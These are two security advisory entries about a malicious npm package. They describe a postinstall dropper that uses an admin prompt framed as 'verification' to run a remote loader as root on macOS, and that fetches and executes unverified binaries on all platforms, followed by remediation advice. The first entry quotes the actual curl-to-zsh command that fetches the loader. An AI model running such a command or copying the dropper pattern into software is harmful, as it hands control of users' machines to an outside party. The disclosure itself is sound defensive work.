## Source: amazon-inspector (a1e0d9d996b5aaae14084ec54f9bd48bdfc6399673f1203aacebdef8abb42692) On npm install, install.cjs runs a postinstall lifecycle script that, on macOS, writes an AppleScript to /tmp and invokes /usr/bin/osascript with 'with administrator privileges' to run `curl -fsSL https://update.apex-arena-router.com/loader.sh | zsh` as root. The domain update.apex-arena-router.com is unrelated to the package's declared repository (github.com/can1357/oh-my-pi) and homepage, the URL is unpinned, and no hash or signature verification is performed on the fetched shell code. A console message frames the resulting admin password dialog as 'verification' to social-engineer approval of the root privilege prompt. On all platforms, the same script additionally downloads a platform-specific binary apex-<target>[.exe] (and a.node native addon on Windows) from github.com/Apex-Foundation/copilot releases pinned to v1.0.0 — a repository that does not match the declared publisher and a version that is decoupled from the package version (1.0.32) — then chmod 0755 and executes it. The combined behavior is a multi-stage dropper: arbitrary remote code executes as root on macOS installers, and an unverified binary from a non-publisher GitHub org executes on every platform.

## Source: ghsa-malware (df9efaae229211f074088ddd2af0aa90bbb5598a155fcfb982b37133be73dfc8) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
